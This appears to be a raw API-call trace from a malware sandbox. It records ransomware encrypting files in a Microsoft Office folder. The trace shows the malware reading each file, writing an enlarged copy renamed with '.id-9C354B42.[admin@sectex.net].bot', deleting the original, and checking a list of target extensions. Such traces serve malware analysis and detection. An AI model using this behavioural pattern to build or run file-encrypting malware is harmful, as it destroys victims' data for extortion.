	[0148.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.885] GetLastError () returned 0x0
	[0148.885] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x1bf80, lpOverlapped=0x0) returned 1
	[0148.888] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x1bf90, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x1bf90, lpOverlapped=0x0) returned 1
	[0148.890] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.891] WriteFile (in: hFile=0x3d4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0148.891] SetEndOfFile (hFile=0x3d4) returned 1
	[0148.891] CloseHandle (hObject=0x3d4) returned 1
	[0148.891] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.891] SetEndOfFile (hFile=0x3f4) returned 1
	[0149.284] CloseHandle (hObject=0x3f4) returned 1
	[0149.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.285] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\onintl.rest.idx_dll")) returned 1
	[0149.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.286] lstrlenW (lpString=".doc") returned 4
	[0149.286] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0149.286] lstrlenW (lpString=".docx") returned 5
	[0149.286] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0149.286] lstrlenW (lpString=".pdf") returned 4
	[0149.286] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0149.286] lstrlenW (lpString=".xls") returned 4
	[0149.286] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0149.286] lstrlenW (lpString=".xlsx") returned 5
	[0149.286] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0149.286] lstrlenW (lpString=".ppt") returned 4
	[0149.286] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0149.286] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.286] lstrlenW (lpString=".zip") returned 4
	[0149.286] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0149.286] lstrlenW (lpString=".rar") returned 4
	[0149.286] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0149.286] lstrlenW (lpString=".bz2") returned 4
	[0149.286] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0149.286] lstrlenW (lpString=".7z") returned 3
	[0149.287] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.287] lstrlenW (lpString=".dbf") returned 4
	[0149.287] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0149.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.287] lstrlenW (lpString=".1cd") returned 4
	[0149.287] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0149.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.287] lstrlenW (lpString=".jpg") returned 4
	[0149.287] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0149.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.287] lstrlenW (lpString=".doc") returned 4
	[0149.287] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0149.287] lstrlenW (lpString=".docx") returned 5
	[0149.287] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0149.287] lstrlenW (lpString=".pdf") returned 4
	[0149.287] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0149.287] lstrlenW (lpString=".xls") returned 4
	[0149.287] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0149.287] lstrlenW (lpString=".xlsx") returned 5
	[0149.287] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0149.287] lstrlenW (lpString=".ppt") returned 4
	[0149.287] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0149.287] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.287] lstrlenW (lpString=".zip") returned 4
	[0149.287] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0149.287] lstrlenW (lpString=".rar") returned 4
	[0149.287] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0149.287] lstrlenW (lpString=".bz2") returned 4
	[0149.287] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0149.288] lstrlenW (lpString=".7z") returned 3
	[0149.288] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.288] lstrlenW (lpString=".dbf") returned 4
	[0149.288] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0149.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.288] lstrlenW (lpString=".1cd") returned 4
	[0149.288] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0149.288] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ONINTL.REST.IDX_DLL") returned 67
	[0149.288] lstrlenW (lpString=".jpg") returned 4
	[0149.288] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0149.288] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0149.288] lstrlenW (lpString="OUTLLIBR.DLL.IDX_DLL") returned 20
	[0149.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0149.288] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=119680) returned 1
	[0149.289] CloseHandle (hObject=0x3f4) returned 1
	[0149.289] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll.idx_dll")) returned 0x20
	[0149.289] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0149.289] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.289] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.290] GetLastError () returned 0x0
	[0149.290] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x1d380, lpOverlapped=0x0) returned 1
	[0149.294] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x1d390, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x1d390, lpOverlapped=0x0) returned 1
	[0149.296] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.296] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0149.296] SetEndOfFile (hFile=0x3ac) returned 1
	[0149.297] CloseHandle (hObject=0x3ac) returned 1
	[0149.297] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.297] SetEndOfFile (hFile=0x3f4) returned 1
	[0149.302] CloseHandle (hObject=0x3f4) returned 1
	[0149.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.302] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.dll.idx_dll")) returned 1
	[0149.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.303] lstrlenW (lpString=".doc") returned 4
	[0149.303] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0149.303] lstrlenW (lpString=".docx") returned 5
	[0149.303] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0149.303] lstrlenW (lpString=".pdf") returned 4
	[0149.303] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0149.303] lstrlenW (lpString=".xls") returned 4
	[0149.303] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0149.303] lstrlenW (lpString=".xlsx") returned 5
	[0149.303] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0149.303] lstrlenW (lpString=".ppt") returned 4
	[0149.303] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0149.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.303] lstrlenW (lpString=".zip") returned 4
	[0149.303] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0149.303] lstrlenW (lpString=".rar") returned 4
	[0149.303] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0149.303] lstrlenW (lpString=".bz2") returned 4
	[0149.303] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString=".7z") returned 3
	[0149.304] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.304] lstrlenW (lpString=".dbf") returned 4
	[0149.304] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.304] lstrlenW (lpString=".1cd") returned 4
	[0149.304] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.304] lstrlenW (lpString=".jpg") returned 4
	[0149.304] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.304] lstrlenW (lpString=".doc") returned 4
	[0149.304] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString=".docx") returned 5
	[0149.304] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0149.304] lstrlenW (lpString=".pdf") returned 4
	[0149.304] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString=".xls") returned 4
	[0149.304] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString=".xlsx") returned 5
	[0149.304] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0149.304] lstrlenW (lpString=".ppt") returned 4
	[0149.304] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.304] lstrlenW (lpString=".zip") returned 4
	[0149.304] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString=".rar") returned 4
	[0149.304] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0149.304] lstrlenW (lpString=".bz2") returned 4
	[0149.305] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0149.305] lstrlenW (lpString=".7z") returned 3
	[0149.305] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.305] lstrlenW (lpString=".dbf") returned 4
	[0149.305] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0149.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.305] lstrlenW (lpString=".1cd") returned 4
	[0149.305] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0149.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.DLL.IDX_DLL") returned 68
	[0149.305] lstrlenW (lpString=".jpg") returned 4
	[0149.305] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0149.305] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0149.305] lstrlenW (lpString="OUTLLIBR.REST.IDX_DLL") returned 21
	[0149.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0149.306] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=290688) returned 1
	[0149.306] CloseHandle (hObject=0x3f4) returned 1
	[0149.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.rest.idx_dll")) returned 0x20
	[0149.306] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0149.306] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.306] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.307] GetLastError () returned 0x0
	[0149.307] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x46f80, lpOverlapped=0x0) returned 1
	[0149.314] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x46f90, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x46f90, lpOverlapped=0x0) returned 1
	[0149.320] ReadFile (in: hFile=0x3f4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.320] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0149.320] SetEndOfFile (hFile=0x3ac) returned 1
	[0149.320] CloseHandle (hObject=0x3ac) returned 1
	[0149.320] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.320] SetEndOfFile (hFile=0x3f4) returned 1
	[0149.329] CloseHandle (hObject=0x3f4) returned 1
	[0149.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.330] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outllibr.rest.idx_dll")) returned 1
	[0149.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.463] lstrlenW (lpString=".doc") returned 4
	[0149.463] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0149.463] lstrlenW (lpString=".docx") returned 5
	[0149.463] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0149.463] lstrlenW (lpString=".pdf") returned 4
	[0149.463] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0149.463] lstrlenW (lpString=".xls") returned 4
	[0149.463] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0149.463] lstrlenW (lpString=".xlsx") returned 5
	[0149.463] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0149.463] lstrlenW (lpString=".ppt") returned 4
	[0149.463] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0149.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.463] lstrlenW (lpString=".zip") returned 4
	[0149.463] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0149.463] lstrlenW (lpString=".rar") returned 4
	[0149.464] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString=".bz2") returned 4
	[0149.464] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString=".7z") returned 3
	[0149.464] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.464] lstrlenW (lpString=".dbf") returned 4
	[0149.464] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.464] lstrlenW (lpString=".1cd") returned 4
	[0149.464] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.464] lstrlenW (lpString=".jpg") returned 4
	[0149.464] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.464] lstrlenW (lpString=".doc") returned 4
	[0149.464] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString=".docx") returned 5
	[0149.464] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0149.464] lstrlenW (lpString=".pdf") returned 4
	[0149.464] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString=".xls") returned 4
	[0149.464] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString=".xlsx") returned 5
	[0149.464] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0149.464] lstrlenW (lpString=".ppt") returned 4
	[0149.464] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.464] lstrlenW (lpString=".zip") returned 4
	[0149.464] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0149.464] lstrlenW (lpString=".rar") returned 4
	[0149.465] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0149.465] lstrlenW (lpString=".bz2") returned 4
	[0149.465] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0149.465] lstrlenW (lpString=".7z") returned 3
	[0149.465] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.465] lstrlenW (lpString=".dbf") returned 4
	[0149.465] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0149.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.465] lstrlenW (lpString=".1cd") returned 4
	[0149.465] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0149.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLLIBR.REST.IDX_DLL") returned 69
	[0149.465] lstrlenW (lpString=".jpg") returned 4
	[0149.465] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0149.465] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0149.465] lstrlenW (lpString="OUTLOOK.DEV_COL.HXC") returned 19
	[0149.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0149.516] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=651) returned 1
	[0149.516] CloseHandle (hObject=0x3f0) returned 1
	[0149.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxc")) returned 0x20
	[0149.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OUTLOOK.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\outlook.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
